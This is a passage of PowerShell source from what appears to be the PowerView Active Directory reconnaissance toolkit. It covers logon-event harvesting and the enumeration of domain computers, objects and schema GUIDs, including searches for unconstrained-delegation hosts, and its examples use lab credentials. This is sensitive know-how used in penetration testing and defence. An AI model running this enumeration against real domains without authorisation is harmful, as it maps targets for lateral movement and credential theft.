'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000 + +Return a max of 1000 logon events from the specified machine using the specified alternate credentials. + +.OUTPUTS + +PowerView.LogonEvent + +PowerView.ExplicitCredentialLogonEvent + +.LINK + +http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LogonEvent')] + [OutputType('PowerView.ExplicitCredentialLogonEvent')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('dnshostname', 'HostName', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME, + + [ValidateNotNullOrEmpty()] + [DateTime] + $StartTime = [DateTime]::Now.AddDays(-1), + + [ValidateNotNullOrEmpty()] + [DateTime] + $EndTime = [DateTime]::Now, + + [ValidateRange(1, 1000000)] + [Int] + $MaxEvents = 5000, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + # the XML filter we're passing to Get-WinEvent + $XPathFilter = @" + + + + + + + + + + + *[ + System[ + Provider[ + @Name='Microsoft-Windows-Security-Auditing' + ] + and + (Level=4 or Level=0) and (EventID=4624 or EventID=4625 or EventID=4634) + ] + ] + and + *[ + EventData[ + ( + (Data[@Name='LogonType']='5' or Data[@Name='LogonType']='0') + or + Data[@Name='TargetUserName']='ANONYMOUS LOGON' + or + Data[@Name='TargetUserSID']='S-1-5-18' + ) + ] + ] + + + +"@ + $EventArguments = @{ + 'FilterXPath' = $XPathFilter + 'LogName' = 'Security' + 'MaxEvents' = $MaxEvents + } + if ($PSBoundParameters['Credential']) { $EventArguments['Credential'] = $Credential } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + + $EventArguments['ComputerName'] = $Computer + + Get-WinEvent @EventArguments| ForEach-Object { + $Event = $_ + $Properties = $Event.Properties + Switch ($Event.Id) { + # logon event + 4624 { + # skip computer logons, for now... + if(-not $Properties[5].Value.EndsWith('$')) { + $Output = New-Object PSObject -Property @{ + ComputerName = $Computer + TimeCreated = $Event.TimeCreated + EventId = $Event.Id + SubjectUserSid = $Properties[0].Value.ToString() + SubjectUserName = $Properties[1].Value + SubjectDomainName = $Properties[2].Value + SubjectLogonId = $Properties[3].Value + TargetUserSid = $Properties[4].Value.ToString() + TargetUserName = $Properties[5].Value + TargetDomainName = $Properties[6].Value + TargetLogonId = $Properties[7].Value + LogonType = $Properties[8].Value + LogonProcessName = $Properties[9].Value + AuthenticationPackageName = $Properties[10].Value + WorkstationName = $Properties[11].Value + LogonGuid = $Properties[12].Value + TransmittedServices = $Properties[13].Value + LmPackageName = $Properties[14].Value + KeyLength = $Properties[15].Value + ProcessId = $Properties[16].Value + ProcessName = $Properties[17].Value + IpAddress = $Properties[18].Value + IpPort = $Properties[19].Value + ImpersonationLevel = $Properties[20].Value + RestrictedAdminMode = $Properties[21].Value + TargetOutboundUserName = $Properties[22].Value + TargetOutboundDomainName = $Properties[23].Value + VirtualAccount = $Properties[24].Value + TargetLinkedLogonId = $Properties[25].Value + ElevatedToken = $Properties[26].Value + } + $Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonEvent') + $Output + } + } + + # logon with explicit credential + 4648 { + # skip computer logons, for now... + if((-not $Properties[5].Value.EndsWith('$')) -and ($Properties[11].Value -match 'taskhost\.exe')) { + $Output = New-Object PSObject -Property @{ + ComputerName = $Computer + TimeCreated = $Event.TimeCreated + EventId = $Event.Id + SubjectUserSid = $Properties[0].Value.ToString() + SubjectUserName = $Properties[1].Value + SubjectDomainName = $Properties[2].Value + SubjectLogonId = $Properties[3].Value + LogonGuid = $Properties[4].Value.ToString() + TargetUserName = $Properties[5].Value + TargetDomainName = $Properties[6].Value + TargetLogonGuid = $Properties[7].Value + TargetServerName = $Properties[8].Value + TargetInfo = $Properties[9].Value + ProcessId = $Properties[10].Value + ProcessName = $Properties[11].Value + IpAddress = $Properties[12].Value + IpPort = $Properties[13].Value + } + $Output.PSObject.TypeNames.Insert(0, 'PowerView.ExplicitCredentialLogonEvent') + $Output + } + } + default { + Write-Warning "No handler exists for event ID: $($Event.Id)" + } + } + } + } + } +} + + +function Get-DomainGUIDMap { +<# +.SYNOPSIS + +Helper to build a hash table of [GUID] -> resolved names for the current or specified Domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-Forest + +.DESCRIPTION + +Searches the forest schema location (CN=Schema,CN=Configuration,DC=testlab,DC=local) for +all objects with schemaIDGUID set and translates the GUIDs discovered to human-readable names. +Then searches the extended rights location (CN=Extended-Rights,CN=Configuration,DC=testlab,DC=local) +for objects where objectClass=controlAccessRight, translating the GUIDs again. + +Heavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.OUTPUTS + +Hashtable + +Ouputs a hashtable containing a GUID -> Readable Name mapping. + +.LINK + +http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] + [CmdletBinding()] + Param ( + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'} + + $ForestArguments = @{} + if ($PSBoundParameters['Credential']) { $ForestArguments['Credential'] = $Credential } + + try { + $SchemaPath = (Get-Forest @ForestArguments).schema.name + } + catch { + throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest' + } + if (-not $SchemaPath) { + throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest' + } + + $SearcherArguments = @{ + 'SearchBase' = $SchemaPath + 'LDAPFilter' = '(schemaIDGUID=*)' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $SchemaSearcher = Get-DomainSearcher @SearcherArguments + + if ($SchemaSearcher) { + try { + $Results = $SchemaSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0] + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_" + } + } + $SchemaSearcher.dispose() + } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_" + } + } + + $SearcherArguments['SearchBase'] = $SchemaPath.replace('Schema','Extended-Rights') + $SearcherArguments['LDAPFilter'] = '(objectClass=controlAccessRight)' + $RightsSearcher = Get-DomainSearcher @SearcherArguments + + if ($RightsSearcher) { + try { + $Results = $RightsSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0] + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_" + } + } + $RightsSearcher.dispose() + } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_" + } + } + + $GUIDs +} + + +function Get-DomainComputer { +<# +.SYNOPSIS + +Return all computers or specific computer objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all computer objects for +the current domain are returned. + +.PARAMETER Identity + +A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994), +or a dns host name (e.g. windows10.testlab.local). Wildcards accepted. + +.PARAMETER UACFilter + +Dynamic parameter that accepts one or more values from $UACEnum, including +"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'. + +.PARAMETER Unconstrained + +Switch. Return computer objects that have unconstrained delegation. + +.PARAMETER TrustedToAuth + +Switch. Return computer objects that are trusted to authenticate for other principals. + +.PARAMETER Printers + +Switch. Return only printers. + +.PARAMETER SPN + +Return computers with a specific service principal name, wildcards accepted. + +.PARAMETER OperatingSystem + +Return computers with a specific operating system, wildcards accepted. + +.PARAMETER ServicePack + +Return computers with a specific service pack, wildcards accepted. + +.PARAMETER SiteName + +Return computers in the specific AD Site name, wildcards accepted. + +.PARAMETER Ping + +Switch. Ping each host to ensure it's up before enumerating. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainComputer + +Returns the current computers in current domain. + +.EXAMPLE + +Get-DomainComputer -SPN mssql* -Domain testlab.local + +Returns all MS SQL servers in the testlab.local domain. + +.EXAMPLE + +Get-DomainComputer -UACFilter TRUSTED_FOR_DELEGATION,SERVER_TRUST_ACCOUNT -Properties dnshostname + +Return the dns hostnames of servers trusted for delegation. + +.EXAMPLE + +Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained + +Search the specified OU for computeres that allow unconstrained delegation. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainComputer -Credential $Cred + +.OUTPUTS + +PowerView.Computer + +Custom PSObject with translated computer property fields. + +PowerView.Computer.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. +#> + + [OutputType('PowerView.Computer')] + [OutputType('PowerView.Computer.Raw')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('SamAccountName', 'Name', 'DNSHostName')] + [String[]] + $Identity, + + [Switch] + $Unconstrained, + + [Switch] + $TrustedToAuth, + + [Switch] + $Printers, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePrincipalName')] + [String] + $SPN, + + [ValidateNotNullOrEmpty()] + [String] + $OperatingSystem, + + [ValidateNotNullOrEmpty()] + [String] + $ServicePack, + + [ValidateNotNullOrEmpty()] + [String] + $SiteName, + + [Switch] + $Ping, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + DynamicParam { + $UACValueNames = [Enum]::GetNames($UACEnum) + # add in the negations + $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"} + # create new dynamic parameter + New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array]) + } + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $CompSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + #bind dynamic parameter to a friendly variable + if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { + New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters + } + + if ($CompSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^CN=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainComputer] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $CompSearcher = Get-DomainSearcher @SearcherArguments + if (-not $CompSearcher) { + Write-Warning "[Get-DomainComputer] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance.Contains('.')) { + $IdentityFilter += "(|(name=$IdentityInstance)(dnshostname=$IdentityInstance))" + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + else { + $IdentityFilter += "(name=$IdentityInstance)" + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['Unconstrained']) { + Write-Verbose '[Get-DomainComputer] Searching for computers with for unconstrained delegation' + $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=524288)' + } + if ($PSBoundParameters['TrustedToAuth']) { + Write-Verbose '[Get-DomainComputer] Searching for computers that are trusted to authenticate for other principals' + $Filter += '(msds-allowedtodelegateto=*)' + } + if ($PSBoundParameters['Printers']) { + Write-Verbose '[Get-DomainComputer] Searching for printers' + $Filter += '(objectCategory=printQueue)' + } + if ($PSBoundParameters['SPN']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with SPN: $SPN" + $Filter += "(servicePrincipalName=$SPN)" + } + if ($PSBoundParameters['OperatingSystem']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with operating system: $OperatingSystem" + $Filter += "(operatingsystem=$OperatingSystem)" + } + if ($PSBoundParameters['ServicePack']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with service pack: $ServicePack" + $Filter += "(operatingsystemservicepack=$ServicePack)" + } + if ($PSBoundParameters['SiteName']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with site name: $SiteName" + $Filter += "(serverreferencebl=$SiteName)" + } + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainComputer] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + # build the LDAP filter for the dynamic UAC filter value + $UACFilter | Where-Object {$_} | ForEach-Object { + if ($_ -match 'NOT_.*') { + $UACField = $_.Substring(4) + $UACValue = [Int]($UACEnum::$UACField) + $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))" + } + else { + $UACValue = [Int]($UACEnum::$_) + $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)" + } + } + + $CompSearcher.filter = "(&(samAccountType=805306369)$Filter)" + Write-Verbose "[Get-DomainComputer] Get-DomainComputer filter string: $($CompSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $CompSearcher.FindOne() } + else { $Results = $CompSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + $Up = $True + if ($PSBoundParameters['Ping']) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $_.properties.dnshostname + } + if ($Up) { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Computer = $_ + $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer.Raw') + } + else { + $Computer = Convert-LDAPProperty -Properties $_.Properties + $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer') + } + $Computer + } + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainComputer] Error disposing of the Results object: $_" + } + } + $CompSearcher.dispose() + } + } +} + + +function Get-DomainObject { +<# +.SYNOPSIS + +Return all (or specified) domain objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all objects for +the current domain are returned. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER UACFilter + +Dynamic parameter that accepts one or more values from $UACEnum, including +"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainObject -Domain testlab.local + +Return all objects for the testlab.local domain + +.EXAMPLE + +'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname + +distinguishedname +----------------- +CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local +CN=dfm,CN=Users,DC=testlab,DC=local +OU=OU3,DC=testlab,DC=local +CN=dfm (admin),CN=Users,DC=testlab,DC=local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainObject -Credential $Cred -Identity 'windows1' + +.EXAMPLE + +Get-Domain | Select-Object -Expand name +testlab.local + +'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainUser] Extracted domain 'testlab.local' from 'testlab\harmj0y' +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y))) + +distinguishedname +----------------- +CN=harmj0y,CN=Users,DC=testlab,DC=local +VERBOSE: [Get-DomainUser] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins' +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins))) +CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local + +.OUTPUTS + +PowerView.ADObject + +Custom PSObject with translated AD object property fields. + +PowerView.ADObject.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.ADObject')] + [OutputType('PowerView.ADObject.Raw')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + DynamicParam { + $UACValueNames = [Enum]::GetNames($UACEnum) + # add in the negations + $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"} + # create new dynamic parameter + New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array]) + } + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $ObjectSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + #bind dynamic parameter to a friendly variable + if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { + New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters + } + if ($ObjectSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^(CN|OU|DC)=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainObject] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $ObjectSearcher = Get-DomainSearcher @SearcherArguments + if (-not $ObjectSearcher) { + Write-Warning "[Get-DomainObject] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('\')) { + $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical + if ($ConvertedIdentityInstance) { + $ObjectDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) + $ObjectName = $IdentityInstance.Split('\')[1] + $IdentityFilter += "(samAccountName=$ObjectName)" + $SearcherArguments['Domain'] = $ObjectDomain + Write-Verbose "[Get-DomainObject] Extracted domain '$ObjectDomain' from '$IdentityInstance'" + $ObjectSearcher = Get-DomainSearcher @SearcherArguments + } + } + elseif ($IdentityInstance.Contains('.')) { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))" + } + else { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))" + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainObject] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + # build the LDAP filter for the dynamic UAC filter value + $UACFilter | Where-Object {$_} | ForEach-Object { + if ($_ -match 'NOT_.*') { + $UACField = $_.Substring(4) + $UACValue = [Int]($UACEnum::$UACField) + $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))" + } + else { + $UACValue = [Int]($UACEnum::$_) + $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)" + } + } + + if ($Filter -and $Filter -ne '') { + $ObjectSearcher.filter = "(&$Filter)" + } + Write-Verbose "[Get-DomainObject] Get-DomainObject filter string: $($ObjectSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $ObjectSearcher.FindOne() } + else { $Results = $ObjectSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Object = $_ + $Object.PSObject.TypeNames.Insert(0, 